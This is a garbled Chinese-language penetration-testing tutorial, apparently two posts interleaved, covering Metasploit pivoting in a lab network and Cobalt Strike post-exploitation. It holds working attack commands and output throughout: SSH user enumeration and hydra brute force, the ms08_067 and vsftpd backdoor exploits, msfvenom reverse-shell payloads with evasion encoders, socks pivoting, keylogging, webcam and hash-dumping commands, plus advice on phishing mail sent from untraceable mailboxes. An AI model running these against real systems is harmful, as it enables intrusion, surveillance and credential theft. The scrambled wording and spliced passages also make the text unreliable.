    要么从JC(7.7.7.20)22端口动手:

    说白点儿其实正是个木马下载器,当指标触发payload未来,会自动去下载shellcode[骨子里正是beacon shell的代码]到目的类别中运作,最终成功弹回指标系列的beacon shell,

    Windows Based Shellcode
    1

    msf > use auxiliary/scanner/ssh/ssh_enumusers  msf auxiliary(ssh_enumusers) > set rhosts 7.7.7.20rhosts => 7.7.7.20msf auxiliary(ssh_enumusers) > set rport 22rport => 22msf auxiliary(ssh_enumusers) > set user_file /usr/share/wordlists/metasploit/default_users_for_services_unhash.txt user_file => /usr/share/wordlists/metasploit/default_users_for_services_unhash.txt msf auxiliary(ssh_enumusers) > run [*] 7.7.7.20:22 - SSH - Checking for false positives [*] 7.7.7.20:22 - SSH - Starting scan [ ] 7.7.7.20:22 - SSH - User 'admin' found [-] 7.7.7.20:22 - SSH - User 'root' not found [-] 7.7.7.20:22 - SSH - User 'Administrator' not found [ ] 7.7.7.20:22 - SSH - User 'sysadm' found [-] 7.7.7.20:22 - SSH - User 'tech' not found [-] 7.7.7.20:22 - SSH - User 'operator' not found [ ] 7.7.7.20:22 - SSH - User 'guest' found [-] 7.7.7.20:22 - SSH - User 'security' not found [-] 7.7.7.20:22 - SSH - User 'debug' not found [ ] 7.7.7.20:22 - SSH - User 'manager' found [-] 7.7.7.20:22 - SSH - User 'service' not found [-] 7.7.7.20:22 - SSH - User '!root' not found [ ] 7.7.7.20:22 - SSH - User 'user' found [-] 7.7.7.20:22 - SSH - User 'netman' not found [ ] 7.7.7.20:22 - SSH - User 'super' found [-] 7.7.7.20:22 - SSH - User 'diag' not found [ ] 7.7.7.20:22 - SSH - User 'Cisco' found [-] 7.7.7.20:22 - SSH - User 'Manager' not found [ ] 7.7.7.20:22 - SSH - User 'DTA' found [-] 7.7.7.20:22 - SSH - User 'apc' not found [ ] 7.7.7.20:22 - SSH - User 'User' found [-] 7.7.7.20:22 - SSH - User 'Admin' not found [ ] 7.7.7.20:22 - SSH - User 'cablecom' found [-] 7.7.7.20:22 - SSH - User 'adm' not found [ ] 7.7.7.20:22 - SSH - User 'wradmin' found [-] 7.7.7.20:22 - SSH - User 'netscreen' not found [ ] 7.7.7.20:22 - SSH - User 'sa' found [-] 7.7.7.20:22 - SSH - User 'setup' not found [ ] 7.7.7.20:22 - SSH - User 'cmaker' found [-] 7.7.7.20:22 - SSH - User 'enable' not found [ ] 7.7.7.20:22 - SSH - User 'MICRO' found [-] 7.7.7.20:22 - SSH - User 'login' not found [*] Caught interrupt from the console... [*] Auxiliary module execution completed ^C msf auxiliary(ssh_enumusers) > 
    

    有关在beacon shell实施的下令都以遵纪守法安顿职务来的,也正是说被控端会按事先鲜明好的岁月自动去调控端下载各个吩咐职分逐黄金年代在目的种类中实行

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

    然后用hydra当地用msf模块开启的1080端口的sock4代理尝试爆破:

    先是,我们先来轻松创造个payload,然后直接把它丢到指标种类中实践,看看实际的上线效果到底是个如何体统,注意,这里带红爪子的是早已获得系统最高权力的,没爪子的主干都以系统权限目前还十分的低的

    Mac Based Shellcode
    1
    2

    root@kali:~# proxychains hydra 7.7.7.20 ssh -s 22 -L /tmp/user.txt -P top100.txt -t 4 ProxyChains-3.1 (http://proxychains.sf.net) Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting  [WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort... [DATA] max 4 tasks per 1 server, overall 64 tasks, 20 login tries (l:2/p:10), ~0 tries per task [DATA] attacking service ssh on port 22 |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK |S-chain|-<>-172.16.0.20:1080-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-7.7.7.20:22-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK<><>-OK<><>-OK<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK [22][ssh] host: 7.7.7.20   login: admin   password: 123456 |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished root@kali:~# 
    

    图片 33

    msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
    Handlers

    发觉有可用帐户密码admin:123456,然后再用sock4代理ssh登陆:

    图片 34

    payload加编码
    命令格式:
    1

    root@kali:~# proxychains ssh admin@7.7.7.20 ProxyChains-3.1 (http://proxychains.sf.net) |D-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK The authenticity of host '7.7.7.20 (7.7.7.20)' can't be established. ECDSA key fingerprint is SHA256:Rcz2KrPF3BTo16Ng1kET91ycbr9c8vOkZcZ6b4VawMQ. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '7.7.7.20' (ECDSA) to the list of known hosts. admin@7.7.7.20's password:  bvshell:/C/Documents and Settings/All Users$ pwd /C/Documents and Settings/All Users bvshell:/C/Documents and Settings/All Users$ dir 2016-12-24  21:32          <DIR> Application Data 2016-12-25  06:16          <DIR> Desktop 2016-12-24  18:36          <DIR> Documents 2016-12-24  18:37          <DIR> DRM 2016-12-24  21:32          <DIR> Favorites 2016-12-24  18:38          <DIR> Start Menu 2016-12-24  21:32          <DIR> Templates       0 Files                  0 bytes       7 Directories bvshell:/C/Documents and Settings/All Users$ 
    

    图片 35

    msfvenom -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -b <bad-chars> -n <nopsled> -f <format> -o <path>

    或者用ms08067:

    图片 36

    常用编码:
    1
    2

    msf > use exploit/windows/smb/ms08_067_netapi  msf exploit(ms08_067_netapi) > show options  Module options (exploit/windows/smb/ms08_067_netapi):    Name     Current Setting  Required  Description    ----     ---------------  --------  -----------    RHOST                     yes       The target address    RPORT    445              yes       The SMB service port    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC) Exploit target:    Id  Name    --  ----   0   Automatic Targeting msf exploit(ms08_067_netapi) > set rhost 7.7.7.20rhost => 7.7.7.20msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > show options  Module options (exploit/windows/smb/ms08_067_netapi):    Name     Current Setting  Required  Description    ----     ---------------  --------  -----------    RHOST    7.7.7.20         yes       The target address    RPORT    445              yes       The SMB service port    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC) Payload options (windows/meterpreter/bind_tcp):    Name      Current Setting  Required  Description    ----      ---------------  --------  -----------    EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)    LPORT     4444             yes       The listen port    RHOST     7.7.7.20         no        The target address Exploit target:    Id  Name    --  ----   0   Automatic Targeting msf exploit(ms08_067_netapi) > run [*] Started bind handler [*] 7.7.7.20:445 - Automatically detecting the target... [*] 7.7.7.20:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown [*] 7.7.7.20:445 - We could not detect the language pack, defaulting to English [*] 7.7.7.20:445 - Selected Target: Windows 2003 SP2 English (NX) [*] 7.7.7.20:445 - Attempting to trigger the vulnerability... [*] Sending stage (957999 bytes) to 7.7.7.20[*] Meterpreter session 2 opened (172.16.0.20-172.16.0.11:0 -> 7.7.7.20:4444)  meterpreter > 
    

    0x04 丰富的顾客端攻击选项

    x86/shikata_ga_nai
    cmd/powershell_base64

    打响溢出getshell后翻看JC(7.7.7.20)网卡音信:

    先是,尝试采取 ‘System Profiler’ 模块,搜聚指标的各种机械和工具消息,举例,指标用的什么版本的操作系统,什么浏览器,详细版本是有个别,有未有装flash,flash具体版本又是多少[低版本能够挂马],看能或无法观望指标内网ip段,大约目测估算下目的内网有多大,有了这个基本功音讯之后,前期大家就足以本着的来信发信,照旧那句话,实际中最佳用域名,因为那边是实验所以才直接用的ip,发信时最佳用html伪装个比较”到位”的链接,关于写信发信又是另多少个相比’职业’的手艺点,个人才具简单,这里暂不涉及,嘿嘿……上面就给大家轻巧的看下实际的效用

    例子:
    1

    meterpreter > ipconfigInterface  1============Name         : MS TCP Loopback interfaceHardware MAC : 00:00:00:00:00:00MTU          : 1520IPv4 Address : 127.0.0.1Interface 65539============Name         : Intel(R) PRO/1000 MT Desktop AdapterHardware MAC : 08:00:27:29:cd:cbMTU          : 1500IPv4 Address : 8.8.8.3IPv4 Netmask : 255.255.255.0Interface 65540============Name         : Intel(R) PRO/1000 MT Desktop Adapter #2Hardware MAC : 08:00:27:e3:47:43MTU          : 1500IPv4 Address : 7.7.7.20IPv4 Netmask : 255.255.255.0meterpreter > 
    

    图片 37

    msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3 -f exe > 1.exe

    察觉又冒出叁个8.8.8.x的网段,于是将以此网段加多路由,以便msf中的模块能够访问到8.8.8.x网段.

    图片 38

    自行选购模块
    变化推行计算器payload例子:
    1

    四、Step3

    图片 39

    msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe > 1.exe

    先直接用新的meterpreter shell看看8.8.8.x这一个网段有哪些机器

    应用’hta payload’同盟’文件下载’模块向目的发送各类钓鱼链接,首先,创设三个hta的payload,这里的payload权且只扶持二种可施行格式,exe,powershell和vba(宏),实际中更推荐用powershell,成功率相对较高,好处就非常少说了,免杀,灵活…

    payload的坑
    常规情况下,利用msfvenom生成的木马文件,可向来上传到指标服务器上运营(加权限卡塔尔国。但自个儿要好蒙受过一个坑,生成的文书内容有大器晚成对是不行的,会挑起报错,如下图所示。

    meterpreter > run post/windows/gather/arp_scanner RHOSTS=8.8.8.0/24[*] Running module against SRV03[*] ARP Scanning 8.8.8.0/24[*]   IP: 8.8.8.3 MAC 08:00:27:29:cd:cb (CADMUS COMPUTER SYSTEMS)[*]   IP: 8.8.8.1 MAC 0a:00:27:00:00:03 (UNKNOWN)[*]   IP: 8.8.8.9 MAC 08:00:27:56:f1:7c (CADMUS COMPUTER SYSTEMS)[*]    IP: 8.8.8.13 MAC 08:00:27:13:a3:b1 (CADMUS COMPUTER SYSTEMS) 
    

    图片 40

    为了让msf中具备模块都能访谈到8.8.8.x网段,在新的meterpreter会话中增多路由:

    图片 41

    meterpreter > run autoroute -s 8.8.8.0/24[*] Adding a route to 8.8.8.0/255.255.255.0...[ ] Added route to 8.8.8.0/255.255.255.0 via 7.7.7.20[*] Use the -p option to list all active routes 
    

    图片 42

    为了让Attacker的除了那个之外msf模块以外的其余应用程序能访谈到8.8.8.x网段,再接受msf的开启sock4代理的模块开启别的贰个端口 作为8.8.8.x网段的进口:

    图片 43

    图片 44

    msf exploit(ms08_067_netapi) > use auxiliary/server/socks4a  msf auxiliary(socks4a) > show options  Module options (auxiliary/server/socks4a):    Name     Current Setting  Required  Description    ----     ---------------  --------  -----------    SRVHOST  172.16.0.20      yes       The address to listen on    SRVPORT  1080             yes       The port to listen on. Auxiliary action:    Name   Description    ----   -----------    Proxy   msf auxiliary(socks4a) > set SRVPORT 1081SRVPORT => 1081msf auxiliary(socks4a) > run [*] Auxiliary module execution completed [*] Starting the socks4a proxy server msf auxiliary(socks4a) > 
    

    图片 45

    减轻方案是vim文件,删除文件起首两好依旧不佳的从头到尾的经过。
    msfconsole
    意义:用来在指令行下运转metasploit。

    也即现在Attacker本地的1080端口的代理能够访谈到7.7.7.x网段,1081端口的代办能够访谈到8.8.8.x网段,然后将新开的端口 增多到proxychains的陈设文件中:

    图片 46

    图片 47

    root@kali:~# cat /etc/proxychains.conf | grep -v "#"dynamic_chainproxy_dns tcp_read_time_out 15000tcp_connect_time_out 8000socks4  172.16.0.20 1080  # First Pivotsocks4  172.16.0.20 1081  # Second Pivot 
    

    图片 48

    启航后可见到metasploit当前版本,以至各类模块的插件数量。
    auxiliary扫描模块
    exploits漏洞使用模块
    payloads
    encoders编码模块
    nops空字符模块

    下面的多少个代理也便是扇门的钥匙,172.16.0.20:1080是7.7.7.x的钥匙,172.16.0.20:1081是7.7.7.x背后的8.8.8.x的钥匙 ,Attacker要想拜候到8.8.8.x得以经过先展开7.7.7.x的门,再展开8.8.8.x的门(因为8.8.8.x那一个门在7.7.7.x那些门之后)

    图片 49

    search寻觅模块
    比方寻觅ms15_034疏漏的利用插件
    1

    使用Attacker本地的nmap扫描下8.8.8.x网段:

    生成基于各式语言的shellcode,如,c,c#,java,python,powershell,ruby,raw,其它,cs也提供了可径直协作veil一齐利用的选项,这里如故以最实用的powershell为例,生成好以往,想方法把脚本载入到对象种类中,这里就径直在对象cmd中载入了,实际中您能够把那一个代码单独扣出来放到任何能实践ps之处

    search ms15_034

    root@kali:~# proxychains nmap -sT -sV -p21,22,23,80 8.8.8.9 -n -Pn -vvProxyChains-3.1 (http://proxychains.sf.net)Starting Nmap 7.25BETA1 ( https://nmap.org )Nmap wishes you a merry Christmas! Specify -sX for Xmas Scan (https://nmap.org/book/man-port-scanning-techniques.html).NSE: Loaded 36 scripts for scanning. Initiating Connect Scan Scanning 8.8.8.9 [4 ports] |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:21-<><>-OK Discovered open port 21/tcp on 8.8.8.9|D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:23-<><>-OK Discovered open port 23/tcp on 8.8.8.9|D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:22-<><>-OK Discovered open port 22/tcp on 8.8.8.9|D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK Discovered open port 80/tcp on 8.8.8.9Completed Connect Scan at 05:54, 1.37s elapsed (4 total ports)Initiating Service scan at 05:54 Scanning 4 services on 8.8.8.9 |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:21-<><>-OK |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:22-<><>-OK |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:23-<><>-OK |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK Completed Service scan at 05:54, 11.09s elapsed (4 services on 1 host)NSE: Script scanning 8.8.8.9. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 05:54 |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK |D-chain|-<>-172.16.0.20:1080-<>-172.16.0.20:1081-<><>-8.8.8.9:80-<><>-OK Completed NSE at 05:54, 1.71s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 05:54 Completed NSE at 05:54, 0.00s elapsed Nmap scan report for 8.8.8.9 Host is up, received user-set (0.41s latency). Scanned  PORT   STATE SERVICE REASON  VERSION 21/tcp open  ftp     syn-ack vsftpd 2.3.4 22/tcp open  ssh     syn-ack OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)23/tcp open  telnet  syn-ack Linux telnetd 80/tcp open  http    syn-ack Apache httpd 2.2.8 ((Ubuntu) DAV/2) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 14.59 seconds root@kali:~# 
    

    # powershell –exec bypass –Command "& {Import-Module 'C:payload.ps1'}"

    察觉8.8.8.9(SK)那台机械恐怕有漏洞,用msf模块尝试getshell:

    图片 50

    图片 51

    msf > msf > use exploit/unix/ftp/vsftpd_234_backdoor msf exploit(vsftpd_234_backdoor) > show options Module options (exploit/unix/ftp/vsftpd_234_backdoor):   Name   Current Setting  Required  Description   ----   ---------------  --------  -----------   RHOST                   yes       The target address   RPORT  21               yes       The target portExploit target:   Id  Name   --  ----   0   Automaticmsf exploit(vsftpd_234_backdoor) > set rhost 8.8.8.9rhost => 8.8.8.9msf exploit(vsftpd_234_backdoor) > run[*] 8.8.8.9:21 - Banner: 220 (vsFTPd 2.3.4)[*] 8.8.8.9:21 - USER: 331 Please specify the password.[ ] 8.8.8.9:21 - Backdoor service has been spawned, handling...[ ] 8.8.8.9:21 - UID: uid=0(root) gid=0(root)[*] Found shell.[*] Command shell session 4 opened (Local Pipe -> Remote Pipe) pwd/iduid=0(root) gid=0(root)ifconfigeth0      Link encap:Ethernet  HWaddr 08:00:27:56:f1:7c            inet addr:8.8.8.9  Bcast:8.8.8.255  Mask:255.255.255.0          inet6 addr: fe80::a00:27ff:fe56:f17c/64 Scope:Link          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1          RX packets:10843 errors:0 dropped:0 overruns:0 frame:0          TX packets:2779 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:1000           RX bytes:1081842 (1.0 MB)  TX bytes:661455 (645.9 KB)          Base address:0xd010 Memory:f0000000-f0020000 lo        Link encap:Local Loopback            inet addr:127.0.0.1  Mask:255.0.0.0          inet6 addr: ::1/128 Scope:Host          UP LOOPBACK RUNNING  MTU:16436  Metric:1          RX packets:18161 errors:0 dropped:0 overruns:0 frame:0          TX packets:18161 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:0           RX bytes:5307479 (5.0 MB)  TX bytes:5307479 (5.0 MB) 
    

    图片 52

    【编辑推荐】

    图片 53

    非常木马弹Shell
    前方小编介绍了哪些运用msfvenom生成木马文件,这里作者介绍怎么着选取msf连接上被奉行的木马文件,达到调控指标服务器。
    常用payload
    首先大家纪念一下生成木马文件的吩咐,在这之中有三个payload的选项,常用的多少个payload。linux相关payload:
    1
    2
    3
    4
    5
    6

    品尝使用office宏钓鱼,并不引入直接那样搞,因为office默许是不启用宏的,但是,能够品味合作使用一些后生可畏度爆出来的相对比较新office 0day来搞,注意日常友好用office应当要禁止使用无数字签证的宏,切莫相信vba

    linux/x86/meterpreter/reverse_tcp
    linux/x86/meterpreter/bind_tcp
    linux/x86/shell_bind_tcp
    linux/x86/shell_reverse_tcp
    linux/x64/shell_reverse_tcp
    linux/x64/shell_bind_tcp

    图片 54

    windows相关payload:
    1
    2
    3
    4
    5
    6
    7
    8

    图片 55

    windows/meterpreter/reverse_tcp
    windows/meterpreter/bind_tcp
    windows/shell_reverse_tcp
    windows/shell_bind_tcp
    windows/x64/meterpreter/reverse_tcp
    windows/x64/meterpreter/bind_tcp
    windows/x64/shell_reverse_tcp
    windows/x64/shell_bind_tcp

    图片 56

    瞩目:含有x六19头适用对象服务器为62人操作系统的,未有x64恐怕应用x86的只适用叁十四位操作系统;含有meterpreter的模块会反弹meterpreter_shell,而常常的shell模块只会反弹普通的shell(反弹结果跟nc相符卡塔 尔(阿拉伯语:قطر‎;reverse_tcp代表木马会主动连接目的服务器,bind_tcp表示木马会监听本地的端口,等待攻击者连接。由此生成的木马文件,要依靠具体情状而定。
    payload选择
    眼下介绍了常用的payload,那么payload选取的三大因素如下:
    木马连接的趋势
    对象操作系统及版本
    反弹的shell类型

    图片 57

    木马连接方向:msf木马分为正向连接与反向连接,正向连接相符攻击机能给连接指标机的场所,反向连接使用对象效果连接攻击机的动静,这里所说的连续几天日常是指tcp的某个端口。因而在生成木马前,供给先推断当前情形,相符正向连接木马依旧反向连接的木马。(能够利用nc工具测验,详细参照他事他说加以考察:【渗透神器类别】nc)
    对象操作系统类型查看:那一个背着了!操作系统位数查看:
    1

    图片 58

    getconf LONG_BIT

    图片 59

    反弹shell类型:这么些重大在于反弹的shell的用场,平日施行系统命令的话普通操作系统的shell就够了。要是想要使用高等作用,举例:键盘记录,开启录制头,增加路由等效能,能够利用meterpreter_shell。
    接连木马
    开启msf,启用exploit/multi/handler模块。
    1
    2
    3
    4
    5
    6

    品味向不奇怪的exe中寄放payload,但是,捆绑完现在的exeLogo或然会被转移,你可以品尝把本来的putty.exe的Logo给扣出来,然后再改动下,好好管理下免杀,之后问题焦点就不太大了,从下图能够清楚地观望,当正规的程序实践完事后,我们的payload也风度翩翩并被实行了[实质上payload是先推行的]

    use exploit/multi/handler
    set payload linux/x86/meterpreter/bind_tcp
    show options
    set RHOST 10.0.0.1
    set LPORT 12345
    exploit

    图片 60

    图片 61

    图片 62

    图片 63

    图片 64

    注意:这里set的payload跟生成木马使用的payload要生龙活虎致,别的的参数根据选取的payload而填写。
    meterpreter shell
    当大家获得指标服务器的meterpreter_shell后,能够扩充过多操作。
    1
    2
    3

    图片 65

    backgroud 将msf进程放到后台
    session -i 1 将经过拖回前台运营
    run vnc 远程桌面包车型大巴开启

    转换古板的usb自运营payload,你供给提供一个payload[其风流浪漫能够一直用cs生成,不过不免杀,最棒依然用你协和解和管理理好的马来搞]就能够,官方说,对xp此前的种类最棒使,win7现在的系统基本废掉了,实用性并超小,所以这边也就不详细说了

    文件管理职能:
    1
    2
    3
    4
    5
    6
    7
    8

    图片 66

    Download 下载文件
    Edit 编辑
    cat 查看
    mkdir 创建
    mv 移动
    rm 删除
    upload 上传
    rmdir 删除文件夹

    有关生成常规的exe payload就相当粗略了,内定下要挂到哪些监听器上,然后给个命中率比较高的名字保存一下,把变化的可试行文件想艺术丢到目的机器上执行下,十分轻松,这里就非常少啰嗦了

    互连网及系统操作:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11

    图片 67

    Arp 看ARP缓冲表
    Ifconfig IP地址网卡
    Getproxy 获替代理
    Netstat 查看端口链接
    Kill 结束进度
    Ps 查看进度
    Reboot 重启计算机
    Reg 校订注册表
    Shell 获取shell
    Shutdown 关闭计算机
    sysinfo 获取Computer新闻

    克隆目的网址针对挂马,提供贰个你想克隆的网址,然后配好团结的url[宪章的玩命跟目的的像一些],然后带上你要执行的payload,这里的payload可以直接用msf生成,也得以像自己这么用hta,当然啦,实际中这么些payload肯定是留神管理过的,机缘谭何轻巧,分明不会乱搞,仍然那句话实际写信最棒用html方便把极其url给管理的更逼真

    客户操作和别的职能批注:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11

    图片 68

    enumdesktops 客户登陆数
    keyscan_dump   键盘记录-下载
    keyscan_start  键盘记录 - 开端
    keyscan_stop   键盘记录 - 结束
    Uictl      获取键盘鼠标调整权
    record_mic    音频录像
    webcam_chat   查看录制头接口
    webcam_list   查看摄像头列表
    webcam_stream  摄像头录制获取
    Getsystem    获取高权力
    Hashdump    下载HASH

    图片 69

    meterpreter增多路由
    很多时候我们赢得到的meterpreter shell处于内网,而笔者辈需求代理到对象内网遭遇中,扫描其内网服务器。那时候能够运用route功效,增加一条通往指标服务器内网的路由。
    翻看shell网络情状:
    1

    图片 70

    meterpreter>run get_local_subnets

    图片 71

    加多一条通往指标服务器内网的路由
    1

    ‘PowerShell Web Delivery’恐怕也是贵宗经常用的最多的功效模块了,其实,它就一定于msf中的web_delivery模块,会生成生机勃勃段shellcode代码,然后会提必要你贰个下载器,那样您就足以把这些下载器插到其它能运维powershell且能正常上网的地点,比如,规范的 chm,急迅格局……,因为只是尝试,作者就一向丢到对象类别的cmd中奉行了

    meterpreter>run autoroute -s 100.0.0.0/8 (依据指标内网网络而定)

    图片 72

    查看路由设置:
    1

    图片 73

    meterpreter>run autoroute –p

    图片 74

    诚如的话,在meterpreter中装置路由便足以高达通往其内网的指标。可是有个别时候依然会停业,当时大家能够background重回msf>,查看下外侧的路由意况。
    1

    图片 75

    route print

    发垃圾邮件,先把持有的靶子邮箱放到贰个文件中[瞩目,每行对应三个],然后再去找个备接收来钓鱼的邮件[一贯查看原著,把html整个粘出来],写完信以往记得先预览下,看看实效,然后再安顿好用来发送邮件的公共邮件服务器,这里本来想用protonmail邮箱服务器来发的,后来收看官方说因为加密的缘故暂不辅助常规的IMAP,POP3,SMTP,无语,这里就先不演示了,特别轻松,实际不亮堂也得以私信作者……,别的,实际中山大学家最棒用手中已部分各类佚名邮箱来发[反正只要不外泄私人音讯会轻便被人追踪到的信箱都得以],这很要紧……切记,图貌似给贴错了,汗……大家懂作者意思就能够

    设若开掘并没有路由音信,表达meterpreter shell设置的路由并不曾生效,大家能够在msf中增添路由。
    1

    图片 76

    msf>route add 10.0.0.0 255.0.0.0 1

    图片 77

    表明:1象征session 1,攻击机倘使要去拜访10.0.0.0/8网段的能源,其下意气风发跳是session1,至于哪些是下一条这里非常的少说了,反正正是当前攻击机能够访谈内网财富了。
    meterpreter端口转载
    设若方今大家扫描到了10网段的有个别ip存在mysql弱口令,账号密码都有了,那么大家能够在肉鸡服务器上登录指标服务器mysql。当然,假若作者想在攻击机上去登入mysql,能够运用端口转载。(有些情况下,内网的机械也不能够互相ssh,需求登入堡垒机卡塔 尔(阿拉伯语:قطر‎
    在meterpreter shell中输入:
    1

    常规java攻击,有版本约束,并且要买证书,实际渗透中,其实前边这么些基本就早已足足了,所以这里就不重要说了

    meterpreter > portfwd add -l 55555 -r 10.0.0.1 -p 3306

    0x05 通过地方这个情势,相信那时候的你早就搞到了一个beacon的shell,下边大家就来详细表明有关beacon shell自个儿的中坚使用[后渗漏阶段],先如果大家获得的是三个还从未bypass掉uac早先的’管理员’权限的beacon shell,以此来进展三番五次的后生可畏都部队分基本操作,需求事先说明一(Wissu卡塔尔国(Beingmate)下cs对普通话的扶助并不佳,假设指标是中国语言历史学系统,有乱码是早晚的

    意味着将10.0.0.1服务器上的3306端口转载到当地的55555端口,然后大家得以在本地运转mysql –h 127.0.0.1 –u root –P 55555 –p 去登录mysql。其余端口如ssh、ftp等都就如,这一个进程跟msf代理很像。
    网络上有关metasploit用法的资料超级多,这里关键记录一些常用用法,以致个体选用进程中的一些坑
    参照文章:http://www.freebuf.com/sectool/72135.htmlhttp://blog.csdn.net/lzhd24/article/details/50664342http://blog.csdn.net/qq_34457594/article/details/52756458http://www.freebuf.com/sectool/56432.htmlhttp://www.freebuf.com/articles/network/125278.html
    传送门
    【渗透神器类别】DNS新闻查询【渗透神器体系】nc【渗透神器连串】nmap【渗透神器类别】Fiddler【渗透神器种类】寻找引擎【渗透神器类别】WireShark

    help 查看beacon shell全体内置命令支持,若是想查看内定命令的用法,能够那样,eg: help checkin

    note 给当前目录机器起个名字, eg: note beacon-shell

    cd在对象种类中切换目录,注目的在于win系统中切换目录要用双反斜杠,或许间接用'/' eg: cd c:

    mkdir 新建目录, eg: mkdir d:beacon

    rm 删除文件或目录, eg: rm d:beacon

    upload 上传文件到对象种类中

    download从目的系列下载钦赐文件,eg: download C:Userswin7cnDesktopputty.exe

    cancel撤除下载职分,比方,八个文件假如特意大,下载或然会拾分耗费时间,假若中途你不想世袭下了,就能够用这么些废除一下

    shell在目的种类中实施钦命的cmd命令, eg: shell whoami

    getuid 查看当前beacon 会话在对象类别中的顾客权限,或者必要bypassuac或然提权

    pwd查看当前在目录系统中的路径

    ls列出当前目录下的有所文件和目录

    drives列表出指标种类的兼具分区[win中叫盘符]

    ps查看目的体系当下的享有的长河列表

    kill杀掉内定进程, eg: kill 4653

    sleep 10内定被控端休眠时间,暗中认可60秒一遍回传,让被控端每10秒来下载贰遍职分,实际中频率不宜过快,轻巧被察觉,80左右二次就可以

    jobs列出装有的天职列表,有些义务施行时间大概某个较长,那时候就足以从职责列表中见到其所对应的具体职分id,针对性的消灭

    jobkill假设发掘职责不知是何原因长日子还未有试行或许非常,可尝试用此命令直接甘休该职务, eg: jobkill 1345

    clear扑灭beacon内部的职务队列

    checkin强制让被控端回连二次

    exit 终止当前beacon 会话

    ctrl k 清屏

    0x06 搜罗目的机器上的每一类音讯[些微大概会触发敏感api导致防护报告急察方,此外进度注入,被控端可能感到极其显眼的卡顿,工具也是有数不胜数不完美之处]:

    在目的体系中放置常规键盘记录, eg: keylogger 1796 x86

    图片 78

    尝试在指标种类中截屏,或许会促成目的系列有很显然的卡顿,eg: screenshot 1796 x86 10 截取10秒

    图片 79

    接受web代理,劫持转载目的浏览器进度数据到钦命的端口上,然后大家再从该端口访问,就相当于拿着对象的浏览器中的数据访谈

    举个例子,我们因而截屏开掘她登入有个别要求账号密码的站点,通过浏览器代理小编就足以兑现无密码间接登入他所登入的不行站点,小编表明技艺不佳,相信我们应该都懂笔者意思

    合法说一时只对IE好使,何况还不安定,成功率一半五成吧,估计是dump进度数据的案由,dump须臾间恐怕会促成目的浏览器巨卡

    但是一定要说这几个主见依然十一分好的,只是效率这几天做的 [ 这里敬拜下作者,大写的赞] ,还不是非常康健,日暮途穷的景况下得以品味下

    browserpivot 1460 x86

    browserpivot stop

    图片 80

    图片 81

    图片 82

    图片 83

    域内渗透相关模块,其实,如果真是域内渗透,我们得以一时不用那样搞,后续再单独说

    kerberos_ccache_use 从ccache文件中程导弹入票据

    kerberos_ticket_purge 死灭当前shell的合同

    kerberos_ticket_use 从ticket文件中程导弹入票据

    0x07 通过各样powershell渗透框架来加强cs的实用性,如,nishang,empire,PowerSploit,powerup,Sherlock……续的,提权,bypassuac,dll注入,抓hash,pth……都以一模二样的用法,主旨照旧在那么些脚本上,关于各种powershell框架的现实用法,请关怀博客相关小说,这里就不后生可畏黄金年代演示了,就回顾说一下用法,当然,beacon shell自己也提供了雷同的功力,只是自己从没说,但其实中丰硕恐怕还缺少,並且它本人的工具工作的亦非蛮好,所以更推荐大家尤为是在win内网渗透中,尽恐怕全体用powershell来搞

